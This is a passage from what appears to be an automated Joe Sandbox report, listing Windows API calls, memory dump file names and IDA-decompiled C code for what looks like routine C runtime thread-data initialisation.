      • Part of subcall function 00143464: GetCurrentProcess.KERNEL32(C0000417), ref: 0014347A
      • Part of subcall function 00143464: TerminateProcess.KERNEL32(00000000), ref: 00143481
      • Part of subcall function 00143CD0: x_ismbbtype_l.LIBCMT ref: 00143CDE
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd
    C-Code - Quality: 91%
    			E0014286D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				intOrPtr _t26;
    				intOrPtr _t30;
    				intOrPtr _t40;
    				void* _t41;
    
    				_t31 = __ebx;
    				_push(8);
    				_push(0x147be0);
    				E00142C80(__ebx, __edi, __esi);
    				GetModuleHandleW(L"KERNEL32.DLL");
    				_t40 =  *((intOrPtr*)(_t41 + 8));
    				 *((intOrPtr*)(_t40 + 0x5c)) = 0x146bd8;
    				 *(_t40 + 8) =  *(_t40 + 8) & 0x00000000;
    				 *((intOrPtr*)(_t40 + 0x14)) = 1;
    				 *((intOrPtr*)(_t40 + 0x70)) = 1;
    				 *((char*)(_t40 + 0xc8)) = 0x43;
    				 *((char*)(_t40 + 0x14b)) = 0x43;
    				 *(_t40 + 0x68) = 0x149320;
    				E001430D6(__ebx, 1, 0xd);
    				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
    				InterlockedIncrement( *(_t40 + 0x68));
    				 *(_t41 - 4) = 0xfffffffe;
    				E0014290F();
    				E001430D6(_t31, 1, 0xc);
    				 *(_t41 - 4) = 1;
    				_t26 =  *((intOrPtr*)(_t41 + 0xc));
    				 *((intOrPtr*)(_t40 + 0x6c)) = _t26;
    				if(_t26 == 0) {
    					_t30 =  *0x149a88; // 0x1499b0
    					 *((intOrPtr*)(_t40 + 0x6c)) = _t30;
    				}
    				E00144547( *((intOrPtr*)(_t40 + 0x6c)));
    				 *(_t41 - 4) = 0xfffffffe;
    				return E00142CC5(E00142918());
    			}

    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00147BE0,00000008,00142975,00000000,00000000,?,00141E3B,00000003), ref: 0014287E
      • Part of subcall function 001430D6: __amsg_exit.LIBCMT ref: 001430F8
      • Part of subcall function 001430D6: EnterCriticalSection.KERNEL32(?,?,?,001428B7,0000000D,?,00141E3B,00000003), ref: 00143100
    • InterlockedIncrement.KERNEL32(00149320), ref: 001428BF
      • Part of subcall function 00144547: InterlockedIncrement.KERNEL32(?), ref: 00144559
      • Part of subcall function 00144547: InterlockedIncrement.KERNEL32(?), ref: 00144566
      • Part of subcall function 00144547: InterlockedIncrement.KERNEL32(?), ref: 00144573
      • Part of subcall function 00144547: InterlockedIncrement.KERNEL32(?), ref: 00144580
      • Part of subcall function 00144547: InterlockedIncrement.KERNEL32(?), ref: 0014458D
      • Part of subcall function 00144547: InterlockedIncrement.KERNEL32(?), ref: 001445A9
      • Part of subcall function 00144547: InterlockedIncrement.KERNEL32(00000000), ref: 001445B9
      • Part of subcall function 00144547: InterlockedIncrement.KERNEL32(?), ref: 001445CF
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1614501937.00141000.00000020.sdmp, Offset: 00140000, based on PE: true
    • Associated: 00000004.00000002.1614314625.00140000.00000002.sdmp
    • Associated: 00000004.00000002.1614616974.00146000.00000002.sdmp
    • Associated: 00000004.00000002.1614637142.00149000.00000004.sdmp
    • Associated: 00000004.00000002.1614656158.0014B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_140000__usm.jbxd